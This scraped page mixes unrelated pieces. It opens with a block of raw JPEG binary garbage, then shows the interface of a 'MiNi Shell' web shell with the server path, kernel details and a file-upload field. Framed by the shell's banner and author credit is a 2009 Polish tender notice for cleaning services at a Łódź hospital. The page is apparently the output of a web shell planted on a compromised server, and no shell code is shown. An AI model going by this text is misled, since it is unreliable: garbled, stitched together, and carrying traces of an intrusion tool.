JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090722/117087-N-2009.html

<p class="kh_header"><b>Łódź: świadczenie usług  sprzątania ciągów komunikacyjnych oraz pomieszczeń   
dla Wojewódzkiego Specjalistycznego Szpitala im. M. Pirogowa w Łodzi 
ZP /  42    /2009</b><br>
<b>Numer ogłoszenia: 117087 - 2009; data zamieszczenia: 22.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi , ul. Wólczańska 191, 90-531 Łódź, woj. łódzkie, tel. 042 6371322, faks 042 6371322.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pirogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług  sprzątania ciągów komunikacyjnych oraz pomieszczeń   
dla Wojewódzkiego Specjalistycznego Szpitala im. M. Pirogowa w Łodzi 
ZP /  42    /2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
Świadczenie usług sprzątania ciągów komunikacyjnych oraz pomieszczeń   
o łącznej powierzchni 2.204 m 2-  szczegółowo określonych w załączniku nr 2 do SIWZ 
I          Zakres  czynności 

             1.  Zakres czynności dla ciągów komunikacyjnych , klatek schodowych , poczekalni , sanitariatów: 
	sprzątanie odbywać się będzie codziennie (7 dni lub 5 dni w tygodniu zgodnie z załącznikiem nr 2 do SIWZ w godzinach 7 -21) i obejmować będzie w szczególności następujące czynności : 
	mycie i konserwację podłóg z zabezpieczeniem antypoślizgowym,
	mycie i czyszczenie parapetów, listew przypodłogowych i grzejników,
	mycie lamperii, glazury i luster,
	utrzymanie w czystości stolarki drzwiowej i okiennej,
	opróżnianie koszy na odpady i wymiana worków plastikowych zgodnie z przyjętą symboliką Szpitala,
	utrzymanie w ciągłej czystości sanitariatów wraz ze stałym ich zaopatrywaniem, w środki higieny: mydło, ręczniki papierowe, papier toaletowy, środki dezynfekcyjno - dezodorujące itp. w ilościach zapewniających ciągłość zabezpieczania bieżących potrzeb.
	czynności w zakresie utrzymania czystości należy wykonywać w części medycznej i biurowej 7.00 -15.00, niemedycznej /ciągi komunikacyjne, klatki schodowe/ do 21.00. 
	czynności porządkowe winny być prowadzone w sposób nie utrudniający  funkcjonowania danego pomieszczenia.
 
2.  Zakres czynności dla Izby Przyjęć:								
	mycie i dezynfekcja ścian- lamperii / co najmniej 1x na tydzień /, 
	podłogi, listwy przypodłogowe, mycie co najmniej 2 x dziennie  
	mycie kaloryferów / 1 x tyg./					   	
	mycie parapetów /1 x dz./  
	opróżnianie i wykładanie workiem pojemników na odpady /co najmniej 1 x dziennie/,    
	mycie pojemników na odpady /codziennie/ 				
	mycie drzwi i futryn / co najmniej 1 x tydzień /,
	mycie przeszkleń w drzwiach /co najmniej  1xdziennie / 	
	mycie i dezynfekcja klamek / 1xdziennie /				
	mycie okien w poczekalni 1 x kwartał, 	
	korytarz - ciąg komunikacyjny w Izbie Przyjęć /mycie 2xdziennie/ dezynfekcja 2 x w tygodniu,	
	drzwi wejściowe od strony parkingu i od głównego korytarza  Szpitala/ co najmniej 1 x dziennie./,
	poczekalnia - mycie co najmniej 2 dziennie, dezynfekcja 1x dziennie
	mycie i dezynfekcja krzeseł co najmniej 1 x w tygodniu,					
	toalety z umywalką /mycie i dezynfekcja toalety, mycie glazury, czyszczenie armatury co najmniej 
       1x dziennie/			
	mycie kratek wentylacyjnych 1 x w miesiącu lub w razie potrzeby,			  	
	mycie lamp oświetleniowych 1 x na tydzień lub w razie potrzeby.	

3.  Zakres czynności sprzątania pomieszczeń Administracji I piętro 
Klatka schodowa	  
	zamiatanie i mycie podłóg                                    -  codziennie 5 x w tyg
	stolarka  drzwiowa i lamperia	                             - 1 x na 2 tygodnie		 
	 mycie okien                                                          - 1 x na kwartał 
Korytarz		
	 zamiatanie i mycie podłóg                                    - codziennie 5 x w tyg                      
	 stolarka  drzwiowa i lamperia	                              - 1 x na 2 tyg
	 przeszkolone drzwi wejściowe                             -  codziennie5 x w tyg
Toaleta z umywalką
	zamiatanie i mycie podłóg			  - codziennie5 x w tyg
	mycie i czyszczenie urządzeń sanitarnych 	  - codziennie 5 x w tyg
	mycie glazury				  - 1 x 2 tygodnie
	mycie okna				          	  - 1 x na kwartał
Pomieszczenia informatyków I piętro - łącznik:
	zamiatanie i mycie podłóg	                              -  2 x w tygodniu
	stolarka drzwiowa			                - 1  x na 2 tygodnie
	mycie okien				                - 1 x na kwartał



4. Ponadto Wykonawca zobowiązany będzie do wykonania następujących  prac  : 

	okresowe wg. potrzeb , nie rzadziej niż 1x na kwartał gruntowne mechaniczne doczyszczanie podłóg, mycie i pokrycie środkiem konserwująco - nabłyszczającym z zabezpieczeniem antypoślizgowym ciągów komunikacyjnych; 
	okresowe wg potrzeb , nie rzadziej niż 1x w miesiącu doczyszczanie podłóg i pokrycie preparatem konserwująco- nabłyszczającym z zabezpieczeniem antypoślizgowym w  poczekalniach;
	okresowe 2 x w miesiącu  gruntowne mechaniczne doczyszczenie ciągów komunikacyjnych w Oddziale Chirurgii Ogólnej i Naczyniowej;
	okresowe 1 x na kwartał  mycie okien  na całej powietrzni przeznaczonej  do sprzątania .
	uzupełnianie dozowników na papier toaletowy, ręczniki papierowe, mydło płynne, zawieszanie kostek zapachowych w toaletach;
	usuwanie odpadów i wymiana worków na odpady medyczne i komunalne zgodnie z przyjętą w szpitalu symboliką odpady medyczne zakaźne - czerwony worek, medyczne niezakaźne - niebieski worek, kolor czarny - komunalne budynek administracji, zgodnie z obowiązującymi przepisami (Rozporządzenie Ministra Zdrowia z dnia  z dnia 23 sierpnia 2007 r.  w sprawie szczegółowego sposobu postępowania z odpadami)
	Wykonawca będzie zobowiązany do sprzątania poremontowego w pomieszczeniach objętych niniejszym zamówieniem jeśli w czasie trwania umowy będą w nich prowadzone remonty. 

5.  Serwis dzienny : 
Wykonawca zobowiązany jest do zapewnienia serwisu dziennego do dyspozycji Działu Eksploatacji polegającego na wykonywaniu doraźnych prac porządkowych związanych z nie przewidzianymi okolicznościami np.: zabrudzenia ciągów komunikacyjnych, szatni,  okoliczności związane z warunkami atmosferycznymi,  krwotoki pacjentów itp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
a)	spełniają warunki zawarte w art. 22 ust. 1 ustawy:
	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
b)	Wykonawca wykonał  lub wykonuje w okresie ostatnich trzech lat przed dniem wszczęcia postępowania 
        o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w tym okresie, co najmniej  dwa  
         zadania polegające na świadczeniu usług sprzątania pomieszczeń zamkniętego zakładu opieki 
         zdrowotnej o wartości 50.000 zł każde z nich w okresie  co najmniej jednego roku.
             c)      Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na 
                     kwotę minimalną nie mniejszą niż 100.000  zł. 
2.	Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie złożonego
            oświadczenia, oraz dołączonych do oferty dokumentów wymienionych w podrozdziale II niniejszego Rozdziału,   
            według zasady spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> II.	Wykonawca jest zobowiązany złożyć wraz z ofertą:
 1. Oświadczenie Wykonawcy - wypełnione i podpisane odpowiednio przez osoby upoważnione do reprezentowania Wykonawcy o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego/ Stosownie do treści art. 22 ust. 1 pkt 1-4 ustawy z dnia 29.1.2004 r. Prawo zamówień publicznych (Dz. U. Nr 19 z 2004r., poz. 177 z póżn. Zm.) zgodnie ze wzorem będącym załącznikiem do SIWZ .
2.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
        3. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego 
              lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy z dnia 29 
              stycznia 2004r. Prawo zamówień publicznych, wystawionych nie wcześniej niż 6 miesięcy przed upływem 
               terminu składania ofert.
      4.   Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy z dnia 29 
             stycznia 2004r. Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu 
              składania ofert.
     5.    Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z 
              opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie       
              na raty zaległych płatności, lub wstrzymani w całości wykonania decyzji właściwego organu  - wystawione nie
              wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6.  Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych  lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu  - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia 
           Wykonawca zobowiązany jest złożyć wraz z ofertą wykaz wykonanych  lub wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usług , zawierający co najmniej dwa zadania  polegające na  świadczeniu usług sprzątania pomieszczeń zamkniętego zakładu opieki zdrowotnej  o wartości 50.000 zł każde z nich w okresie  co najmniej jednego roku.
             Wykaz winien zawierać :
               nazwy i adresy inwestora, opis wykonanego przedmiotu, jego wartość oraz daty wykonania zamówienia. W odniesieniu do wskazanych w wykazie zamówień należy dołączyć dokumenty potwierdzające ich należyte wykonanie
W celu potwierdzenia opisanych  przez Zamawiającego warunków posiadania znajdowania się przez Wykonawcę  w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: 
Kopie polisy lub innego dokumentu ubezpieczenia, potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimalną nie mniejszą niż 100.000 PLN.

Forma dokumentów 
1.	Wszystkie dokumenty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy na każdej zapisanej stronie poświadczanego dokumentu. 
2.	Gdy przedstawiona kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości w inny sposób, może on zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu. 
3.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez osoby upoważnione do reprezentowania wykonawcy. 
4.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, poświadczenia za zgodność z oryginałem powinien dokonać Pełnomocnik..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pirogow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WSSz. im. M. Pirogowa w Łodzi
90-531 Łódź, ul. Wólczańska 191/195
Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: WSSz. im. M. Pirogowa w Łodzi
90-531 Łódź, ul. Wólczańska 191/195
Dział Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com